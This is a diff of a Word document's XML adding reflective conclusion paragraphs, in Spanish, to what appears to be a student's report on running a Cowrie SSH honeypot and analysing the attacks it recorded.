@@ -32764,7 +33571,64 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">El principal aprendizaje ha sido comprobar que la ciberseguridad defensiva no requiere necesariamente herramientas costosas ni infraestructura compleja. Con software libre, un servidor cloud de pocos euros al mes y conocimientos de scripting es posible construir un sistema de inteligencia de amenazas que produce resultados comparables a los de soluciones comerciales. Esta democratización de la ciberseguridad es especialmente relevante para pequeñas organizaciones que no disponen de presupuesto para soluciones enterprise pero que igualmente necesitan comprender las amenazas que enfrentan.</w:t>
+        <w:t xml:space="preserve">La decisión que más me ha enseñado no fue técnica. Pasé más de un día esperando a que Oracle tuviera capacidad, con un script que lo intentaba cada minuto, y durante ese tiempo el proyecto estuvo bloqueado por una dependencia que no controlaba. Cuando por fin cambié de proveedor, el traslado solo afectó a la creación de la máquina, porque había escrito los scripts de despliegue sin atarlos a Oracle. De ahí saco dos aprendizajes: fijar un límite de tiempo a cualquier bloqueo externo antes de buscar alternativas, y diseñar desde el principio pensando en que el entorno puede cambiar. También rechacé la retención de 93 € que pedía Oracle para su plan de pago: preferí un proveedor con saldo prepago y sin tarjeta guardada, porque controlar el coste de un servidor expuesto a Internet también es una decisión de seguridad.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">El segundo aprendizaje es desconfiar de lo que parece funcionar. Un carácter con tilde en el fichero de credenciales hacía que Cowrie rechazara todos los accesos sin mostrar ningún error, y el servicio de systemd fallaba por dos motivos encadenados que no aparecían en mis pruebas locales. En ambos casos lo que me salvó fue haber obligado a los scripts a comprobar el resultado en lugar de dar los pasos por buenos. Lo mismo ocurrió con los datos: la primera gráfica de países atribuía el 90 % de los ataques a Países Bajos porque solo geolocalizaba las 20 IPs más activas. Corregirlo cambió la conclusión, y me recordó que un análisis puede ser técnicamente correcto y aun así engañoso.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Los resultados también me han dado una lección de humildad. Esperaba ver atacantes probando contraseñas y descubrí que una parte de ellos me estaba analizando a mí, comprobando si el servidor era un honeypot antes de decidir qué hacer. Observar en directo campañas documentadas como Outlaw o RedTail, en lugar de leer sobre ellas, da otra dimensión a lo estudiado en el ciclo.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Por último, el proyecto conecta con mi trayectoria anterior: tras muchos años como operador en una central receptora de alarmas, vigilar eventos, distinguir el ruido de lo relevante y actuar con un procedimiento claro me resulta familiar. Este trabajo me ha confirmado que quiero orientar mi carrera hacia la monitorización de seguridad y la respuesta a incidentes, y me ha dado un caso práctico real, documentado y público con el que demostrarlo.</w:t>
       </w:r>
     </w:p>
     <w:p>
